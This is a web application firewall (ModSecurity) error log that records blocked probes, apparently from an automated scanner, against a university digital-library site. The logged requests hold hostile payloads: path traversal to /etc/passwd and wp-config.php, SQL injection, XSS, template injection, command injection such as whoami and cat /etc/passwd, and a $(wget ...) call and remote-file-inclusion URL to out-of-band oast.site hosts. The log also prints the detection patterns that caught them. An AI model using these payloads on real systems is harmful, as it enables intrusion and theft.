[Tue Aug 29 11:41:39.357547 2023] [:error] [pid 1060] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\b(?:(?:s(?:ys\\\\.(?:user_(?:(?:t(?:ab(?:_column|le)|rigger)|object|view)s|c(?:onstraints|atalog))|all_tables|tab)|elect\\\\b.{0,40}\\\\b(?:substring|users?|ascii))|m(?:sys(?:(?:queri|ac)e|relationship|column|object)s|ysql\\\\.(db|user))|c(?:onstraint ..." at ARGS:sql. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "116"] [id "950007"] [rev "2"] [msg "Blind SQL Injection Attack"] [data "Matched Data: systables found within ARGS:sql: select st.tablename from sys.systables st"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/nacos/v1/cs/ops/derby"] [unique_id "ZO13A8Co-f0AAAQkBhgAAAAC"]
[Tue Aug 29 11:41:40.597570 2023] [:error] [pid 1479] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fn. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:fn: ../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO13BMCo-f0AAAXHqE4AAAAT"]
[Tue Aug 29 11:41:42.398207 2023] [:error] [pid 1834] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:adminDirHand. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:adminDirHand: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/include/dialog/config.php"] [unique_id "ZO13BsCo-f0AAAcqJSEAAAAG"]
[Tue Aug 29 11:41:45.422588 2023] [:error] [pid 1689] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:value. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:value: $(wget http:/cjmnbitjmimt14dgn26g4fd33my9mztfn.oast.site))"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/"] [unique_id "ZO13CcCo-f0AAAaZ9w0AAAAo"]
[Tue Aug 29 11:41:46.439474 2023] [:error] [pid 1060] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:alg_wc_pif_download_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:alg_wc_pif_download_file: ../../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/wp-admin/admin-post.php"] [unique_id "ZO13CsCo-f0AAAQkBigAAAAC"]
[Tue Aug 29 11:41:49.530524 2023] [:error] [pid 1479] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:language. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:language: ../../../../../../../../../../etc/passwd\\x00.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/kvmlm2/index.dhtml"] [unique_id "ZO13DcCo-f0AAAXHqGUAAAAT"]
[Tue Aug 29 11:41:56.424665 2023] [:error] [pid 1870] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13FMCo-f0AAAdOeNMAAAAS"]
[Tue Aug 29 11:41:57.461137 2023] [:error] [pid 1876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:score. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:score: 2134\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/"] [unique_id "ZO13FcCo-f0AAAdUcxIAAAAZ"]
[Tue Aug 29 11:41:58.387264 2023] [:error] [pid 1872] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:rsvp_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: sleep( found within ARGS:rsvp_id: (select(0)from(select(sleep(5)))a)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/wp-json/rsvpmaker/v1/stripesuccess/anythinghere"] [unique_id "ZO13FsCo-f0AAAdQ3csAAAAV"]
[Tue Aug 29 11:42:00.372975 2023] [:error] [pid 1839] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26g3ox8p5hcddiz6.oast.site/hqbq.txt found within TX:1: cjmnbitjmimt14dgn26g3ox8p5hcddiz6.oast.site/hqbq.txt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilib.unla.ac.id"] [uri "/plugins/ueditor/php/controller.php"] [unique_id "ZO13GMCo-f0AAAcvBhwAAAAJ"]
[Tue Aug 29 11:42:01.408735 2023] [:error] [pid 1874] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:controller: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13GcCo-f0AAAdSZJIAAAAX"]
[Tue Aug 29 11:42:04.367454 2023] [:error] [pid 1882] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:cat /etc/passwd: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilib.unla.ac.id"] [uri "/command.cgi"] [unique_id "ZO13HMCo-f0AAAdaZMkAAAAM"]
[Tue Aug 29 11:42:05.437203 2023] [:error] [pid 1876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:download. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:download: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13HcCo-f0AAAdUcyoAAAAZ"]
[Tue Aug 29 11:42:06.416111 2023] [:error] [pid 1876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:msg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:msg: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/wp-content/plugins/socialfit/popup.php"] [unique_id "ZO13HsCo-f0AAAdUcywAAAAZ"]
[Tue Aug 29 11:42:07.672089 2023] [:error] [pid 1872] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:file: ../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO13H8Co-f0AAAdQ3eQAAAAV"]
[Tue Aug 29 11:42:07.704739 2023] [:error] [pid 1855] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:apikey. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:apikey: 'UNION select 1,'YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=';"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/fw.login.php"] [unique_id "ZO13H8Co-f0AAAc-5zIAAAAN"]
[Tue Aug 29 11:42:08.367406 2023] [:error] [pid 1854] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../ found within ARGS:file: /../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO13IMCo-f0AAAc@cWQAAAAL"]
[Tue Aug 29 11:42:08.391807 2023] [:error] [pid 1847] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:service-cmds-peform. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:service-cmds-peform: ||whoami||"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/cyrus.index.php"] [unique_id "ZO13IMCo-f0AAAc36zQAAAAO"]
[Tue Aug 29 11:42:09.398436 2023] [:error] [pid 1838] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:file: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13IcCo-f0AAAcuUn0AAAAI"]
[Tue Aug 29 11:42:11.372360 2023] [:error] [pid 1869] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:sn. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:sn: ../../WEB-INF/"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/brightmail/servlet/com.ve.kavachart.servlet.ChartStream"] [unique_id "ZO13I8Co-f0AAAdNKFYAAAAR"]
[Tue Aug 29 11:42:11.438243 2023] [:error] [pid 1768] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13I8Co-f0AAAbo-awAAAAi"]
[Tue Aug 29 11:42:12.421994 2023] [:error] [pid 1879] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:file: ../../../../../../../../../../../../../etc/passwd\\x00.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/downloader.php"] [unique_id "ZO13JMCo-f0AAAdXIlYAAAAd"]
[Tue Aug 29 11:42:14.356364 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13JsCo-f0AAAQSWykAAAA0"]
[Tue Aug 29 11:42:14.406220 2023] [:error] [pid 1870] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:file: ../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/filemanager/ajax_calls.php"] [unique_id "ZO13JsCo-f0AAAdOeP0AAAAS"]
[Tue Aug 29 11:42:14.445726 2023] [:error] [pid 1768] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:pg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:pg: ../../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/tarantella/cgi-bin/secure/ttawlogin.cgi/"] [unique_id "ZO13JsCo-f0AAAbo-bIAAAAi"]
[Tue Aug 29 11:42:15.389412 2023] [:error] [pid 1872] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:cat_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: } found within ARGS:cat_id: ${system(ls)}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilib.unla.ac.id"] [uri "/infusions/downloads/downloads.php"] [unique_id "ZO13J8Co-f0AAAdQ3fMAAAAV"]
[Tue Aug 29 11:42:17.401067 2023] [:error] [pid 1880] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page_slug. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:page_slug: ../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13KcCo-f0AAAdYBBAAAAAe"]
[Tue Aug 29 11:42:19.351296 2023] [:error] [pid 1882] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:search_key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: } found within ARGS:search_key: {{1337*1338}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilib.unla.ac.id"] [uri "/search"] [unique_id "ZO13K8Co-f0AAAdaZOkAAAAM"]
[Tue Aug 29 11:42:19.407074 2023] [:error] [pid 1882] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:configuration. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:configuration: o:10:pma_config:1:{s:6:source s:11:/etc/passwd }"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilib.unla.ac.id"] [uri "/scripts/setup.php"] [unique_id "ZO13K8Co-f0AAAdaZOsAAAAM"]
[Tue Aug 29 11:42:21.597077 2023] [:error] [pid 1881] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:classes_dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:classes_dir: ../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/classes/phpmailer/class.cs_phpmailer.php"] [unique_id "ZO13LcCo-f0AAAdZZqcAAAAf"]
[Tue Aug 29 11:42:23.388529 2023] [:error] [pid 1881] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:</script><script>alert(document.domain)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS_NAMES:</script><script>alert(document.domain)</script>: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/src/addressbook.php"] [unique_id "ZO13L8Co-f0AAAdZZqoAAAAf"]
